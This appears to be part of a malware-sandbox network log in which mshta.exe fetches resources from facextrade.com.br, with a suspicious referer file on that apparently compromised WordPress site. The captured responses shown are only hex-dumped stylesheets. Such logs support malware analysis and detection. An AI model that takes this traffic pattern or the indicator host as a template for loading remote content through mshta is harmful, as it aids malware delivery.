74 65 78 74 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 2e 69 6e 70 75 74 2d 62 6c 6f 63 6b 2d 6c 65 76 65 6c 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 7d 0a 40 2d 6d 73 2d 76 69 65 77 70 6f 72 74 20 7b 0a 20 20 77 69 64 74 68 3a 20 64 65 76 69 63 65 2d 77 69 64 74 68 3b 0a 7d 0a 2e 68 69 64 64 65 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 2e 76 69 73 69 62 6c 65 2d 70 68 6f 6e 65 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2e 76 69 73 69 62 6c 65 2d 74 61 62 6c 65 74 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2e 68 69 64 64 65 6e 2d 64 65 73 6b 74 6f 70 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2e 76 69 73 69 62 6c 65 2d 64 65 73 6b 74 6f 70 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 68 65 72 69 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38
                                        Data Ascii: /*! * Bootstrap Responsive v2.3.0 * * Copyright 2012 Twitter, Inc * Licensed under the Apache License v2.0 * http://www.apache.org/licenses/LICENSE-2.0 * * Designed and built with all the love in the world @twitter by @mdo and @fat. */.clearfix { *zoom: 1;}.clearfix:before,.clearfix:after { display: table; content: ""; line-height: 0;}.clearfix:after { clear: both;}.hide-text { font: 0/0 a; color: transparent; text-shadow: none; background-color: transparent; border: 0;}.input-block-level { display: block; width: 100%; min-height: 30px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box;}@-ms-viewport { width: device-width;}.hidden { display: none; visibility: hidden;}.visible-phone { display: none !important;}.visible-tablet { display: none !important;}.hidden-desktop { display: none !important;}.visible-desktop { display: inherit !important;}@media (min-width: 768
                                        Aug 16, 2022 10:48:42.505269051 CEST360OUTGET /wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:42.727580070 CEST362INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:42 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 10 Aug 2021 23:54:25 GMT
                                        ETag: "1eb103-41cd-5c93d38b56102"
                                        Accept-Ranges: bytes
                                        Content-Length: 16845
                                        Connection: close
                                        Content-Type: text/css


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        6192.168.2.2249181187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:42.777533054 CEST381OUTGET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.2.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:43.024678946 CEST393INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:42 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 02 Apr 2019 21:39:18 GMT
                                        ETag: "a4fabd-1735-58592f81e2d80"
                                        Accept-Ranges: bytes
                                        Content-Length: 5941
                                        Connection: close
                                        Content-Type: text/css
                                        Data Raw: 2f 2a 0a 20 2a 20 6a 51 75 65 72 79 20 46 6c 65 78 53 6c 69 64 65 72 20 76 32 2e 32 2e 30 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 6f 6f 74 68 65 6d 65 73 2e 63 6f 6d 2f 66 6c 65 78 73 6c 69 64 65 72 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 32 20 57 6f 6f 54 68 65 6d 65 73 0a 20 2a 20 46 72 65 65 20 74 6f 20 75 73 65 20 75 6e 64 65 72 20 74 68 65 20 47 50 4c 76 32 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6e 75 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 67 70 6c 2d 32 2e 30 2e 68 74 6d 6c 0a 20 2a 0a 20 2a 20 43 6f 6e 74 72 69 62 75 74 69 6e 67 20 61 75 74 68 6f 72 3a 20 54 79 6c 65 72 20 53 6d 69 74 68 20 28 40 6d 62 6d 75 66 66 66 69 6e 29 0a 20 2a 2f 0a 0a 0a 2f 2a 20 42 72 6f 77 73 65 72 20 52 65 73 65 74 73 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 20 61 3a 61 63 74 69 76 65 2c 0a 2e 66 6c 65 78 73 6c 69 64 65 72 20 61 3a 61 63 74 69 76 65 2c 0a 2e 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 20 61 3a 66 6f 63 75 73 2c 0a 2e 66 6c 65 78 73 6c 69 64 65 72 20 61 3a 66 6f 63 75 73 20 20 7b 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 7d 0a 2e 73 6c 69 64 65 73 2c 0a 2e 66 6c 65 78 2d 63 6f 6e 74 72 6f 6c 2d 6e 61 76 2c 0a 2e 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 2d 6e 61 76 20 7b 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 7d 0a 2e 66 6c 65 78 73 6c 69 64 65 72 2d 72 74 6c 20 7b 64 69 72 65 63 74 69 6f 6e 3a 72 74 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 3b 7d 0a 2f 2a 20 49 63 6f 6e 20 46 6f 6e 74 73 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2f 2a 20 46 6f 6e 74 2d 66 61 63 65 20 49 63 6f 6e 73 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 66 6c 65 78 73 6c 69 64 65 72 2d 69 63 6f 6e 27 3b 0a 09 73 72 63 3a 75 72 6c 28 27 66 6f 6e 74 73 2f 66 6c 65 78 73 6c 69 64 65 72 2d 69 63 6f 6e 2e 65 6f 74 27 29 3b 0a 09 73 72 63 3a 75 72 6c 28 27 66 6f 6e 74 73 2f 66 6c 65 78 73 6c 69 64 65 72 2d 69 63 6f 6e 2e 65 6f 74 3f 23 69 65 66 69 78 27 29 20 66 6f 72 6d 61 74 28 27 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 27 29 2c 0a 09 09 75 72 6c 28 27 66 6f 6e 74 73 2f 66 6c 65 78 73 6c 69 64 65 72 2d 69 63 6f 6e 2e 77 6f 66 66 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 0a 09 09 75 72 6c 28 27 66 6f 6e 74 73 2f 66 6c 65 78 73 6c 69 64 65 72 2d 69 63 6f 6e 2e 74 74 66 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 0a 09 09 75 72 6c 28 27 66 6f 6e 74 73 2f 66 6c 65 78 73 6c 69 64 65 72 2d 69 63 6f 6e 2e 73 76 67 23 66 6c 65 78 73 6c 69 64 65 72 2d 69 63 6f 6e 27 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 09 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 0a 2f 2a 20 46 6c 65 78 53 6c 69 64 65 72 20 4e 65 63 65 73 73 61 72 79 20 53 74 79 6c 65 73 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 66 6c 65 78 73 6c 69 64 65 72 20 7b 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20
                                        Data Ascii: /* * jQuery FlexSlider v2.2.0 * http://www.woothemes.com/flexslider/ * * Copyright 2012 WooThemes * Free to use under the GPLv2 license. * http://www.gnu.org/licenses/gpl-2.0.html * * Contributing author: Tyler Smith (@mbmufffin) *//* Browser Resets*********************************/.flex-container a:active,.flexslider a:active,.flex-container a:focus,.flexslider a:focus {outline: none;}.slides,.flex-control-nav,.flex-direction-nav {margin: 0; padding: 0; list-style: none;}.flexslider-rtl {direction:rtl; text-align:right;}/* Icon Fonts*********************************//* Font-face Icons */@font-face {font-family: 'flexslider-icon';src:url('fonts/flexslider-icon.eot');src:url('fonts/flexslider-icon.eot?#iefix') format('embedded-opentype'),url('fonts/flexslider-icon.woff') format('woff'),url('fonts/flexslider-icon.ttf') format('truetype'),url('fonts/flexslider-icon.svg#flexslider-icon') format('svg');font-weight: normal;font-style: normal;}/* FlexSlider Necessary Styles*********************************/.flexslider {margin: 0; padding:
                                        Aug 16, 2022 10:48:43.024712086 CEST394INData Raw: 30 3b 7d 0a 2e 66 6c 65 78 73 6c 69 64 65 72 20 2e 73 6c 69 64 65 73 20 3e 20 6c 69 20 7b 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 7d
                                        Data Ascii: 0;}.flexslider .slides > li {display: none; -webkit-backface-visibility: hidden;} /* Hide the slides before the JS is loaded. Avoids image jumping */.flexslider .slides img {width: 100%; display: block;}.flex-pauseplay span {text-transform:
                                        Aug 16, 2022 10:48:43.024735928 CEST396INData Raw: 2a 20 44 69 72 65 63 74 69 6f 6e 20 4e 61 76 20 2a 2f 0a 2e 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 2d 6e 61 76 20 7b 2a 68 65 69 67 68 74 3a 20 30 3b 7d 0a 2e 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 2d 6e 61 76 20 61 20 20 7b 20 64 69 73 70
                                        Data Ascii: * Direction Nav */.flex-direction-nav {*height: 0;}.flex-direction-nav a { display: block; width: 40px; height: 40px; margin: -20px 0 0; position: absolute; top: 50%; z-index: 10; overflow: hidden; opacity: 0; cursor: pointer; color: rgba(0
                                        Aug 16, 2022 10:48:43.024760008 CEST397INData Raw: 66 6c 65 78 73 6c 69 64 65 72 2d 72 74 6c 20 2e 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 2d 6e 61 76 20 61 2e 66 6c 65 78 2d 6e 65 78 74 3a 62 65 66 6f 72 65 20 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 66 30 30 31 27 3b 20 7d 0a 2e 66 6c 65 78
                                        Data Ascii: flexslider-rtl .flex-direction-nav a.flex-next:before { content: '\f001'; }.flexslider-rtl .flex-direction-nav a.flex-prev:before { content: '\f002'; }/* Pause/Play */.flex-pauseplay a { display: block; width: 20px; height: 20px; position
                                        Aug 16, 2022 10:48:43.024780989 CEST398INData Raw: 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 37 29 3b 20 7d 0a 2e 66 6c 65 78 2d 63 6f 6e 74 72 6f 6c 2d 70 61 67 69 6e 67 20 6c 69 20 61 2e 66 6c 65 78 2d 61 63 74 69 76 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 30 3b 20 62 61 63
                                        Data Ascii: : rgba(0,0,0,0.7); }.flex-control-paging li a.flex-active { background: #000; background: rgba(0,0,0,0.9); cursor: default; }.flex-control-thumbs {margin: 5px 0 0; position: static; overflow: hidden;}.flex-control-thumbs li {width: 25%; fl


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        7192.168.2.2249182187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:42.966952085 CEST392OUTGET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1.24 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:43.205640078 CEST400INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:43 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 02 Apr 2019 21:39:19 GMT
                                        ETag: "a4fae3-1724-58592f82d6fc0"
                                        Accept-Ranges: bytes
                                        Content-Length: 5924
                                        Connection: close
                                        Content-Type: text/css
                                        Data Raw: 2f 2a 20 0a 20 2a 20 09 43 6f 72 65 20 4f 77 6c 20 43 61 72 6f 75 73 65 6c 20 43 53 53 20 46 69 6c 65 0a 20 2a 09 76 31 2e 32 34 0a 20 2a 2f 0a 0a 2f 2a 20 63 6c 65 61 72 66 69 78 20 2a 2f 0a 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 77 72 61 70 70 65 72 3a 61 66 74 65 72 20 7b 0a 09 63 6f 6e 74 65 6e 74 3a 20 22 2e 22 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 0a 09 68 65 69 67 68 74 3a 20 30 3b 0a 7d 0a 2f 2a 20 64 69 73 70 6c 61 79 20 6e 6f 6e 65 20 75 6e 74 69 6c 20 69 6e 69 74 20 2a 2f 0a 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 7b 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 2d 6d 73 2d 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 70 61 6e 2d 79 3b 0a 7d 0a 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 77 72 61 70 70 65 72 7b 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 70 78 2c 20 30 70 78 2c 20 30 70 78 29 3b 0a 7d 0a 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 77 72 61 70 70 65 72 2d 6f 75 74 65 72 7b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 77 72 61 70 70 65 72 2d 6f 75 74 65 72 2e 61 75 74 6f 48 65 69 67 68 74 7b 0a 09 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 68 65 69 67 68 74 20 35 30 30 6d 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 09 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 68 65 69 67 68 74 20 35 30 30 6d 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 09 2d 6d 73 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 68 65 69 67 68 74 20 35 30 30 6d 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 09 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 68 65 69 67 68 74 20 35 30 30 6d 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 09 74 72 61 6e 73 69 74 69 6f 6e 3a 20 68 65 69 67 68 74 20 35 30 30 6d 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 7d 0a 09 0a 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 69 74 65 6d 7b 0a 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 7d 0a 2e 6f 77 6c 2d 63 6f 6e 74 72 6f 6c 73 20 2e 6f 77 6c 2d 70 61 67 65 2c 0a 2e 6f 77 6c 2d 63 6f 6e 74 72 6f 6c 73 20 2e 6f 77 6c 2d 62 75 74 74 6f 6e 73 20 64 69 76 7b 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 7d 0a 2e 6f 77 6c 2d 63 6f 6e 74 72 6f 6c 73 20 7b 0a 09 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 09 2d 6b 68 74 6d 6c 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 09 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 09 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 09 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 09 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 29 3b 0a 7d 0a
                                        Data Ascii: /* * Core Owl Carousel CSS File *v1.24 *//* clearfix */.owl-carousel .owl-wrapper:after {content: ".";display: block;clear: both;visibility: hidden;line-height: 0;height: 0;}/* display none until init */.owl-carousel{display: none;position: relative;width: 100%;-ms-touch-action: pan-y;}.owl-carousel .owl-wrapper{display: none;position: relative;-webkit-transform: translate3d(0px, 0px, 0px);}.owl-carousel .owl-wrapper-outer{overflow: hidden;position: relative;width: 100%;}.owl-carousel .owl-wrapper-outer.autoHeight{-webkit-transition: height 500ms ease-in-out;-moz-transition: height 500ms ease-in-out;-ms-transition: height 500ms ease-in-out;-o-transition: height 500ms ease-in-out;transition: height 500ms ease-in-out;}.owl-carousel .owl-item{float: left;}.owl-controls .owl-page,.owl-controls .owl-buttons div{cursor: pointer;}.owl-controls {-webkit-user-select: none;-khtml-user-select: none;-moz-user-select: none;-ms-user-select: none;user-select: none;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);}
                                        Aug 16, 2022 10:48:43.205693007 CEST401INData Raw: 0a 2f 2a 20 6d 6f 75 73 65 20 67 72 61 62 20 69 63 6f 6e 20 2a 2f 0a 2e 67 72 61 62 62 69 6e 67 20 7b 20 0a 20 20 20 20 63 75 72 73 6f 72 3a 75 72 6c 28 67 72 61 62 62 69 6e 67 2e 70 6e 67 29 20 38 20 38 2c 20 6d 6f 76 65 3b 0a 7d 0a 0a 2f 2a 20
                                        Data Ascii: /* mouse grab icon */.grabbing { cursor:url(grabbing.png) 8 8, move;}/* fix */.owl-carousel .owl-wrapper,.owl-carousel .owl-item{-webkit-backface-visibility: display;-moz-backface-visibility: display;-ms-backface-visibil
                                        Aug 16, 2022 10:48:43.205800056 CEST402INData Raw: 65 20 62 6f 74 68 3b 0a 20 20 2d 6d 6f 7a 2d 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 54 6f 46 61 64 65 20 2e 37 73 20 65 61 73 65 20 62 6f 74 68 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 54 6f 46 61 64 65 20 2e 37 73 20
                                        Data Ascii: e both; -moz-animation: scaleToFade .7s ease both; animation: scaleToFade .7s ease both;}.owl-goDown-in { -webkit-animation: goDown .6s ease both; -moz-animation: goDown .6s ease both; animation: goDown .6s ease both;}/* scaleUp
                                        Aug 16, 2022 10:48:43.205820084 CEST404INData Raw: 61 74 65 5a 28 2d 35 30 30 70 78 29 20 74 72 61 6e 73 6c 61 74 65 58 28 2d 32 30 30 25 29 3b 20 7d 0a 7d 0a 40 2d 6d 6f 7a 2d 6b 65 79 66 72 61 6d 65 73 20 62 61 63 6b 53 6c 69 64 65 4f 75 74 20 7b 0a 20 20 32 35 25 20 7b 20 6f 70 61 63 69 74 79
                                        Data Ascii: ateZ(-500px) translateX(-200%); }}@-moz-keyframes backSlideOut { 25% { opacity: .5; -moz-transform: translateZ(-500px); } 75% { opacity: .5; -moz-transform: translateZ(-500px) translateX(-200%); } 100% { opacity: .5; -moz-transform: tr
                                        Aug 16, 2022 10:48:43.205837011 CEST405INData Raw: 6f 20 7b 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 2e 38 29 3b 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 54 6f 46 61 64 65 20 7b 0a 20 20 74 6f 20 7b 20 6f 70 61
                                        Data Ascii: o { opacity: 0; -moz-transform: scale(.8); }}@keyframes scaleToFade { to { opacity: 0; transform: scale(.8); }}@-webkit-keyframes goDown { from { -webkit-transform: translateY(-100%); }}@-moz-keyframes goDown { from { -moz-transfor


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        8192.168.2.2249183187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:43.260390997 CEST406OUTGET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.theme.css?ver=1.24 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:43.491091967 CEST408INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:43 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 02 Apr 2019 21:39:19 GMT
                                        ETag: "a4faed-680-58592f82d6fc0"
                                        Accept-Ranges: bytes
                                        Content-Length: 1664
                                        Connection: close
                                        Content-Type: text/css
                                        Data Raw: 2f 2a 0a 2a 20 09 4f 77 6c 20 43 61 72 6f 75 73 65 6c 20 4f 77 6c 20 44 65 6d 6f 20 54 68 65 6d 65 20 0a 2a 09 76 31 2e 32 34 0a 2a 2f 0a 0a 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 63 6f 6e 74 72 6f 6c 73 7b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2f 2a 20 53 74 79 6c 69 6e 67 20 4e 65 78 74 20 61 6e 64 20 50 72 65 76 20 62 75 74 74 6f 6e 73 20 2a 2f 0a 0a 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 63 6f 6e 74 72 6f 6c 73 20 2e 6f 77 6c 2d 62 75 74 74 6f 6e 73 20 64 69 76 7b 0a 09 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 7a 6f 6f 6d 3a 20 31 3b 0a 09 2a 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 2f 2a 49 45 37 20 6c 69 66 65 2d 73 61 76 65 72 20 2a 2f 0a 09 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 33 70 78 20 31 30 70 78 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 30 70 78 3b 0a 09 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 30 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 38 36 39 37 39 31 3b 0a 09 66 69 6c 74 65 72 3a 20 41 6c 70 68 61 28 4f 70 61 63 69 74 79 3d 35 30 29 3b 2f 2a 49 45 37 20 66 69 78 2a 2f 0a 09 6f 70 61 63 69 74 79 3a 20 30 2e 35 3b 0a 7d 0a 2f 2a 20 43 6c 69 63 6b 61 62 6c 65 20 63 6c 61 73 73 20 66 69 78 20 70 72 6f 62 6c 65 6d 20 77 69 74 68 20 68 6f 76 65 72 20 6f 6e 20 74 6f 75 63 68 20 64 65 76 69 63 65 73 20 2a 2f 0a 2f 2a 20 55 73 65 20 69 74 20 66 6f 72 20 6e 6f 6e 2d 74 6f 75 63 68 20 68 6f 76 65 72 20 61 63 74 69 6f 6e 20 2a 2f 0a 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 63 6f 6e 74 72 6f 6c 73 2e 63 6c 69 63 6b 61 62 6c 65 20 2e 6f 77 6c 2d 62 75 74 74 6f 6e 73 20 64 69 76 3a 68 6f 76 65 72 7b 0a 09 66 69 6c 74 65 72 3a 20 41 6c 70 68 61 28 4f 70 61 63 69 74 79 3d 31 30 30 29 3b 2f 2a 49 45 37 20 66 69 78 2a 2f 0a 09 6f 70 61 63 69 74 79 3a 20 31 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 2f 2a 20 53 74 79 6c 69 6e 67 20 50 61 67 69 6e 61 74 69 6f 6e 2a 2f 0a 0a 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 63 6f 6e 74 72 6f 6c 73 20 2e 6f 77 6c 2d 70 61 67 65 7b 0a 